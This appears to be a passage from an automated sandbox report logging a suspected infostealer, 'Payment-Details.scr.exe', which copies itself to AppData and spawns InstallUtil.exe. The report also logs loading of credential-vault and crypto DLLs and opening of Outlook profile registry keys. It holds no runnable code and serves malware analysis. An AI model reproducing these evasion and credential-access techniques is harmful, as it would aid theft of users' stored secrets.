                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Payment-Details.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payment-Details.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
